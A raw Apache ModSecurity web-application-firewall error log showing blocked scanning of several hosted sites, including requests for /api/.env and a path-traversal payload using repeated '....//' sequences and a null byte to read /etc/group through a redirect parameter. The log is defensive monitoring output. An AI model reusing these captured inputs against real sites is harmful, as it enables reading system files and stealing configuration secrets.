[Tue May 12 05:05:10.361118 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.42:55180] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKY5ggpmE1yW0glLdgmuQAAAM4"]
[Tue May 12 05:05:10.361274 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.42:55180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKY5ggpmE1yW0glLdgmuQAAAM4"]
[Tue May 12 05:05:11.165292 2026] [security2:error] [pid 1730175:tid 1730191] [client 45.148.10.42:44996] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYz3o6NvB9WXx5V-6mMwAAAQ4"]
[Tue May 12 05:05:12.743573 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.42:18108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY1ggpmE1yW0glLdgmqgAAAME"]
[Tue May 12 05:05:12.799112 2026] [security2:error] [pid 1820198:tid 1820207] [client 45.148.10.42:45054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYz81tk6y7yBJLpJoyLwAAAIc"]
[Tue May 12 05:05:14.028880 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.42:32754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKY6s1tk6y7yBJLpJoyUAAAAJQ"]
[Tue May 12 05:05:14.029103 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.42:32754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKY6s1tk6y7yBJLpJoyUAAAAJQ"]
[Tue May 12 05:05:16.027848 2026] [security2:error] [pid 1825287:tid 1825314] [client 45.148.10.42:44814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyggpmE1yW0glLdgmlQAAAMk"]
[Tue May 12 05:05:20.799408 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.42:27658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyRfeipD4uoG21FopJwAAAAM"]
[Tue May 12 05:05:20.872183 2026] [security2:error] [pid 1820198:tid 1820219] [client 45.148.10.42:44926] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYys1tk6y7yBJLpJoyHwAAAJM"]
[Tue May 12 05:05:22.341497 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.42:44880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYys1tk6y7yBJLpJoyIAAAAIw"]
[Tue May 12 05:05:22.929851 2026] [security2:error] [pid 1730207:tid 1730225] [client 45.148.10.42:45036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYzzue9Sp-pIv_Bb67_AAAAVA"]
[Tue May 12 05:05:25.401001 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.42:44986] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYz9r1yOh9TvizeziXjQAAAFg"]
[Tue May 12 05:05:27.167086 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.42:18110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY1tr1yOh9TvizeziXkgAAAEk"]
[Tue May 12 05:05:30.034329 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.42:44836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyno6NvB9WXx5V-6mJwAAARM"]
[Tue May 12 05:05:30.045690 2026] [security2:error] [pid 1825179:tid 1825203] [client 45.148.10.42:45150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY0tr1yOh9TvizeziXjwAAAEU"]
[Tue May 12 05:05:30.531285 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.42:18152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY2s1tk6y7yBJLpJoyNwAAAIU"]
[Tue May 12 05:05:32.596953 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.42:55136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY3no6NvB9WXx5V-6mQgAAARY"]
[Tue May 12 05:05:32.619456 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.42:44830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYyno6NvB9WXx5V-6mJgAAARE"]
[Tue May 12 05:05:33.283286 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.42:55180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY5ggpmE1yW0glLdgmuQAAAM4"]
[Tue May 12 05:05:34.947588 2026] [security2:error] [pid 1730175:tid 1730185] [client 45.148.10.42:44950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYz3o6NvB9WXx5V-6mNQAAAQg"]
[Tue May 12 05:05:34.982156 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.148.10.42:55174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY4QgpmE1yW0glLdgmtgAAAMg"]
[Tue May 12 05:05:35.145323 2026] [security2:error] [pid 1730207:tid 1730228] [client 45.148.10.42:45028] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKYzzue9Sp-pIv_Bb67-wAAAVM"]
[Tue May 12 05:05:36.229648 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.42:32754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agKY6s1tk6y7yBJLpJoyUAAAAJQ"]
[Tue May 12 05:06:05.109143 2026] [security2:error] [pid 1730175:tid 1730179] [client 43.134.121.208:42494] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agKZHXo6NvB9WXx5V-6mcgAAAQI"]
[Tue May 12 05:06:06.050507 2026] [:error] [pid 1825287:tid 1825313] [client 74.7.243.217:50646] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 05:06:10.543266 2026] [security2:error] [pid 1825179:tid 1825197] [client 43.134.121.208:48856] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agKZItr1yOh9TvizeziX0AAAAEA"], referer: http://www.cpc-entreprises.com
[Tue May 12 05:06:12.819597 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RQAAAVA"]
[Tue May 12 05:06:12.819665 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RQAAAVA"]
[Tue May 12 05:06:12.819748 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ..../..../..../..../..../..../..../..../..../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RQAAAVA"]
[Tue May 12 05:06:12.820431 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RQAAAVA"]
[Tue May 12 05:06:12.820675 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RQAAAVA"]
[Tue May 12 05:06:12.916006 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.916087 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.916319 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.916359 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.916397 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.916449 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ..../..../..../..../..../..../..../..../..../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.917136 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
[Tue May 12 05:06:12.917391 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 28 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJDue9Sp-pIv_Bb68RwAAAVA"]
